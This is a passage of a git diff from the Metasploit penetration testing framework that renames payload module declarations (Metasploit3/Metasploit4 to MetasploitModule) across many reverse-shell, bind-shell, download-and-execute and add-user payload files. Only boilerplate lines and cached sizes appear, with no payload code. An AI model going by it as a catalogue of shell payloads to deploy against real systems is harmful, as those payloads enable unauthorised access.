-15,7 +15,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index f8352a26de..ee7e1c55e2 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_bsd' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 722c4f71f6..73af2e47f9 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_bsd' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index 51c42e0b2a..5e2b8ba269 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 73 diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index 364b19f021..91287cd4a0 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 87 diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index 80f4aa6955..0cb7111680 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 60 diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 389ff04691..7cec06f54b 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 70 diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index a1be7400f4..f7f2c2a538 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 64 diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 3de4c6b8ba..19d50fe386 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 96 diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 6de81667fc..40f238704a 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 2a1ba296ef..cbe48df2fa 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index 229632db3b..2fbd74f012 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/singles/cmd/unix/bind_awk.rb b/modules/payloads/singles/cmd/unix/bind_awk.rb index 9d232ba539..5daf081d65 100644 --- a/modules/payloads/singles/cmd/unix/bind_awk.rb +++ b/modules/payloads/singles/cmd/unix/bind_awk.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 96 diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index bebc37ed4a..ccf344d794 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 487 diff --git a/modules/payloads/singles/cmd/unix/bind_lua.rb b/modules/payloads/singles/cmd/unix/bind_lua.rb index 63d63f582a..48f3ea4637 100644 --- a/modules/payloads/singles/cmd/unix/bind_lua.rb +++ b/modules/payloads/singles/cmd/unix/bind_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index be87603bc0..f6fede2db6 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb index d22c62128f..ec8804a2ab 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb index aa0255cc18..68e518e90f 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 25 diff --git a/modules/payloads/singles/cmd/unix/bind_nodejs.rb b/modules/payloads/singles/cmd/unix/bind_nodejs.rb index 22e4a5999f..b795bdd184 100644 --- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1843 diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 003b4a081e..d169b2c3d1 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 240 diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index 01d2798d01..d8d3e52457 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/cmd/unix/bind_ruby.rb b/modules/payloads/singles/cmd/unix/bind_ruby.rb index 790e5bf18b..f445299ee3 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 137 diff --git a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb index 3dc333efc5..7b012a8e01 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 142 diff --git a/modules/payloads/singles/cmd/unix/bind_zsh.rb b/modules/payloads/singles/cmd/unix/bind_zsh.rb index 9772d7a5a8..49389b7186 100644 --- a/modules/payloads/singles/cmd/unix/bind_zsh.rb +++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 112 diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index 3b982b201f..870888f0e4 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 8 diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index e40b0aad4e..282de3060d 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index 2ef164ebd7..006f6a497f 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 130 diff --git a/modules/payloads/singles/cmd/unix/reverse_awk.rb b/modules/payloads/singles/cmd/unix/reverse_awk.rb index 05402d4153..348126cb55 100644 --- a/modules/payloads/singles/cmd/unix/reverse_awk.rb +++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index 381833bdb1..ff8f54d19b 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb index 6c10b6194c..f6ad174f4d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_lua.rb b/modules/payloads/singles/cmd/unix/reverse_lua.rb index 95bbd8dd3c..32b84f8b9d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_lua.rb +++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 1c63d2d10b..1b45da190d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb index 5040d2cba9..ed12e38ec8 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 35 diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 1d3dd09b0f..bbfba208ca 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1971 diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb index d89af6ad67..09e380f172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 182 diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 0aafd22aba..43b2e09835 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 234 diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb index 8e134bd9de..a948e187b5 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index 08a8f93942..b5ec5558ce 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 132 diff --git a/modules/payloads/singles/cmd/unix/reverse_python.rb b/modules/payloads/singles/cmd/unix/reverse_python.rb index 4e9d7c6b5b..4712d0f048 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index b1ab1b26f4..d5d07c0499 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 587 diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb index 502efcbb0c..229874d83a 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 133 diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb index 009d0f00aa..5e14ec9289 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 185 diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index bdf31d2045..38f2bcc93f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/cmd/unix/reverse_zsh.rb b/modules/payloads/singles/cmd/unix/reverse_zsh.rb index 9127052406..2f168a313e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_zsh.rb +++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb index 3a74d57100..dd34557f1e 100644 --- a/modules/payloads/singles/cmd/windows/adduser.rb +++ b/modules/payloads/singles/cmd/windows/adduser.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 97 diff --git a/modules/payloads/singles/cmd/windows/bind_lua.rb b/modules/payloads/singles/cmd/windows/bind_lua.rb index d9226dd894..493a4cb4e4 100644 --- a/modules/payloads/singles/cmd/windows/bind_lua.rb +++ b/modules/payloads/singles/cmd/windows/bind_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index 8f540f9a69..0525da8574 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 139 diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index 8bbf6d4845..6b6f946c45 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 140 diff --git a/modules/payloads/singles/cmd/windows/bind_ruby.rb b/modules/payloads/singles/cmd/windows/bind_ruby.rb index 9271e9df85..dbeaeba1c7 100644 --- a/modules/payloads/singles/cmd/windows/bind_ruby.rb +++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 128 diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index 5d0e450c91..b9f1e41a93 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index f70437fc6d..0f9ee789a3 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/windows/generic.rb b/modules/payloads/singles/cmd/windows/generic.rb index 047dc0bfc4..e97a3f57b1 100644 --- a/modules/payloads/singles/cmd/windows/generic.rb +++ b/modules/payloads/singles/cmd/windows/generic.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 8 diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b33a5a6741..b047521eeb 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/powershell' require 'msf/core/payload/windows/powershell' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 1518 diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 5174312512..18701955de 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/powershell' require 'msf/core/payload/windows/powershell' require 'msf/core/handler/reverse_tcp_ssl' -module Metasploit3 +module MetasploitModule CachedSize = 1526 diff --git a/modules/payloads/singles/cmd/windows/reverse_lua.rb b/modules/payloads/singles/cmd/windows/reverse_lua.rb index fbe52645ad..8fb40e10d1 100644 --- a/modules/payloads/singles/cmd/windows/reverse_lua.rb +++ b/modules/payloads/singles/cmd/windows/reverse_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index ff007384f0..9b6eefe03a 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 148 diff --git a/modules/payloads/singles/cmd/windows/reverse_powershell.rb b/modules/payloads/singles/cmd/windows/reverse_powershell.rb index 510f4b5df5..eb6bd4c53b 100644 --- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb +++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1204 diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb index fa61454995..056283fb95 100644 --- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 126 diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb index 9f3dcbc1d5..782ed8627d 100644 --- a/modules/payloads/singles/firefox/exec.rb +++ b/modules/payloads/singles/firefox/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 1019 diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index ce5b678d01..450a54ed7a 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 3b007df865..4f9ad61ee7 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index 8c8a6569fc..943b202789 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb 